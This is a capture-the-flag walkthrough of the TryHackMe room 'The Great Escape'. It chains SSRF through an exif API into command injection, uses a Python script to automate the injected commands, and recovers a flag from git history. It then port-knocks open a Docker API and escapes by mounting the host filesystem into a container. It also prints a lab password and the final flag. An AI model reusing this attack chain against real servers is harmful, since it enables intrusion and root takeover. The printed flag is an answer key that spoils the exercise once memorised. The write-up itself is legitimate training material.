# CTF TryHackMe - The Great Escape

# The Great Escape

## Nmap

```bash
nmap -A -oN nmap.log 10.10.46.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-02 05:44 EDT
Nmap scan report for 10.10.46.152
Host is up (0.064s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh?
| fingerprint-strings: 
|   GenericLines: 
|_    ydFtT6w"s?Em:Q++0e+
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-title: docker-escape-nuxt
|_http-server-header: nginx/1.19.6
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.92%I=7%D=7/2%Time=62C01379%P=x86_64-pc-linux-gnu%r(Gener
SF:icLines,16,"ydFt\\T6w\"s\?Em:Q\+\+0e\+\r\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.75 seconds
```

* 22 - SSH
* 80 - HTTP

## Check robots.txt

```bash
curl http://10.10.46.152/robots.txt
User-agent: *
Allow: /
Disallow: /api/
# Disallow: /exif-util
Disallow: /*.bak.txt$
```

* /api/
* /exif-util
* /*.bak.txt

## API

```bash
curl http://10.10.46.152/api/
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Nothing to see here</title>
</head>
<body>

<p>Nothing to see here, move along...</p>

</body>
</html>
```

Let's continue

## Exif-util

Go to **http://10.10.46.152/exif-util**

It's a upload page, we can upload file to extract metadata informations, or we can specify an URL.

Let's try an url

## Exif-util from URL

```bash
echo "this is a test" > test.txt

python -m http.server
```

I specify my url : **http://10.8.90.22:8000/test.txt**

```
        An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                this is a test
```

And it seems, i can read the content of the file! Let's see the api call with firefox developer tools

```
GET http://10.10.46.152/api/exif?url=http://10.8.90.22:8000/test.txt
```

Testing with the command line :

```bash
curl http://10.10.46.152/api/exif?url=http://10.8.90.22:8000/test.txt
An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                this is a test
```
That the same okay!

## Explore /*.bak.txt$

the * symbole, indicate to me to test something like that : exif-util.bak.txt let's try to curl this :

```bash
curl http://10.10.46.152/exif-util.bak.txt

<template>
  <section>
    <div class="container">
      <h1 class="title">Exif Utils</h1>
      <section>
        <form @submit.prevent="submitUrl" name="submitUrl">
          <b-field grouped label="Enter a URL to an image">
            <b-input
              placeholder="http://..."
              expanded
              v-model="url"
            ></b-input>
            <b-button native-type="submit" type="is-dark">
              Submit
            </b-button>
          </b-field>
        </form>
      </section>
      <section v-if="hasResponse">
        <pre>
          {{ response }}
        </pre>
      </section>
    </div>
  </section>
[..SNIP..]
```

In the output, i saw this URL : **http://api-dev-backup:8080/exif**

I thing the this url call also the api. let's try!

```
        An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Nothing to see here</title>
</head>
<body>

<p>Nothing to see here, move along...</p>

</body>
</html>
```

So we go the same as the **http://10.10.46.152/api/**

Try to use this API inception ahah. I put this url on page : **http://10.10.46.152/exif-util/**

```
http://api-dev-backup:8080/exif?url=http://10.8.90.22:8000/test.txt
```

But the response was : 

```
        An error occurred: Read timed out
                Response was:
                ---------------------------------------
                <-- -1 http://api-dev-backup:8080/exif?url=http://10.8.90.22:8000/test.txt
Response : 
Length : 0
Body : (empty)
Headers : (0
```

Then, test this localhost ? 

```
http://api-dev-backup:8080/exif?url=http://127.0.0.1/test.txt

        An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                An error occurred: File format could not be determined
               Retrieved Content
               --------------------------------------
```

Trying without any URL ? 

```bash
http://api-dev-backup:8080/exif?url=

        An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                An error occurred: File format could not be determined
               Retrieved Content
               ----------------------------------------
               curl: no URL specified!
curl: try 'curl --help' or 'curl --manual' for more information
```

Oh yeah! I thing it's just a curl to the URL specified ! Tried to inject command :

```bash
http://api-dev-backup:8080/exif?url=http://127.0.0.1/;id

        An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                An error occurred: File format could not be determined
               Retrieved Content
               ----------------------------------------
               uid=0(root) gid=0(root) groups=0(root)
```

Oh, we are root !!!

## Commande injection making python script

```
import requests
import sys

##
# source : https://blog.hydrashead.net/posts/thm-the-great-escape/
##

ip = "10.10.46.152"
cmd = sys.argv[1]

r = requests.get(f'http://{ip}/api/exif?url=http://api-dev-backup:8080/exif?url=http://127.0.0.1/;{cmd}')

# To remove the 6 first lines of the output, which indicate errors during the curl on localhost
for line in r.text.splitlines()[6:]:
    print(line)
```


We can explore the /root : 

```bash 
python3 cmd.py "ls -la /root"
               total 28
drwx------ 1 root root 4096 Jan  7  2021 .
drwxr-xr-x 1 root root 4096 Jan  7  2021 ..
lrwxrwxrwx 1 root root    9 Jan  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Jan  7  2021 .git
-rw-r--r-- 1 root root   53 Jan  6  2021 .gitconfig
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-rw-r-- 1 root root  201 Jan  7  2021 dev-note.txt
```

What contain dev-note.txt ?

```bash
python3 cmd.py "cat /root/dev-note.txt"
               Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123

Cheers,

Hydra
```

## Explore root directory

There is a `.git` directory, let's see the logs :

```bash
python3 cmd.py "cd /root; git log"
               commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra <hydragyrum@example.com>
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes
```

Oh great, try to checkout to the commit *Added the flag and dev notes*

```bash
python3 cmd.py "cd /root; git checkout a3d30a7d0510dc6565ff9316e3fb84434916dee8; ls -la"
               Note: checking out 'a3d30a7d0510dc6565ff9316e3fb84434916dee8'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at a3d30a7 Added the flag and dev notes
total 40
drwx------ 1 root root 4096 Jul  3 12:50 .
drwxr-xr-x 1 root root 4096 Jan  7  2021 ..
lrwxrwxrwx 1 root root    9 Jan  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4096 Jul  3 12:50 .git
-rw-r--r-- 1 root root   53 Jan  6  2021 .gitconfig
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  213 Jul  3 12:50 dev-note.txt
-rw-r--r-- 1 root root   75 Jul  3 12:50 flag.txt
```

So, got the flag

```bash
python3 cmd.py "cd /root; cat flag.txt"                                                 
               You found the root flag, or did you?

THM{REDACTED}
```

Checking also the old **dev-note.txt** file

```bash
python3 cmd.py "cd /root; cat dev-note.txt"
               Hey guys,

I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.

Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.

Cheers,

Hydra
```

It seems, we need to perform a port knocking to open up the docker tcp port

## Port knocking 

Use this script to perform port knocking **https://github.com/grongor/knock**

```bash
git clone https://github.com/grongor/knock.git

cd knock

./knock 10.10.12.146 42 1337 10420 6969 63000
```

Cool, let's check if the docker port (2375) id open now :

```bash
nmap -A -p 2375 10.10.12.146

PORT     STATE SERVICE VERSION
2375/tcp open  docker  Docker 20.10.2 (API 1.41)
| docker-version: 
|   Version: 20.10.2
|   Platform: 
|     Name: Docker Engine - Community
|   ApiVersion: 1.41
|   MinAPIVersion: 1.12
|   Os: linux
|   GoVersion: go1.13.15
|   BuildTime: 2020-12-28T16:15:09.000000000+00:00
|   KernelVersion: 4.15.0-130-generic
|   GitCommit: 8891c58
|   Arch: amd64
|   Components: 
|     
|       Version: 20.10.2
|       Name: Engine
|       Details: 
|         Arch: amd64
|         KernelVersion: 4.15.0-130-generic
|         Experimental: false
|         MinAPIVersion: 1.12
|         Os: linux
|         GoVersion: go1.13.15
|         GitCommit: 8891c58
|         ApiVersion: 1.41
|         BuildTime: 2020-12-28T16:15:09.000000000+00:00
|     
|       Version: 1.4.3
|       Name: containerd
|       Details: 
|         GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
|     
|       Version: 1.0.0-rc92
|       Name: runc
|       Details: 
|         GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
|     
|       Version: 0.19.0
|       Name: docker-init
|       Details: 
|_        GitCommit: de40ad0
Service Info: OS: linux
```

Yeah, it is !!

## Exploit with docker API

Test the api with a simple listing of docker images 

```bash
docker -H tcp://10.10.12.146:2375 images
REPOSITORY                                    TAG       IMAGE ID       CREATED         SIZE
exif-api-dev                                  latest    4084cb55e1c7   18 months ago   214MB
exif-api                                      latest    923c5821b907   18 months ago   163MB
frontend                                      latest    577f9da1362e   18 months ago   138MB
endlessh                                      latest    7bde5182dc5e   18 months ago   5.67MB
nginx                                         latest    ae2feff98a0c   18 months ago   133MB
debian                                        10-slim   4a9cd57610d6   18 months ago   69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   19 months ago   103MB
alpine                                        3.9       78a2ce922f86   2 years ago     5.55MB
```

We see there is an alpine image. We can use it to deploy a container with a volume to mount /root directory of the docker host into our created container

```bash
docker -H tcp://10.10.12.146:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh

# ls -la
total 24
drwx------  3 root root 4096 Jan  6  2021 .
drwxr-xr-x 22 root root 4096 Jan  9  2021 ..
lrwxrwxrwx  1 root root    9 Jan  6  2021 .bash_history -> /dev/null
-rw-r-----  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jan  6  2021 .local
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   74 Jan  6  2021 flag.txt
# cat flag.txt
Congrats, you found the real flag!

THM{c62517c0cad93ac93a92b1315a32d734}
```

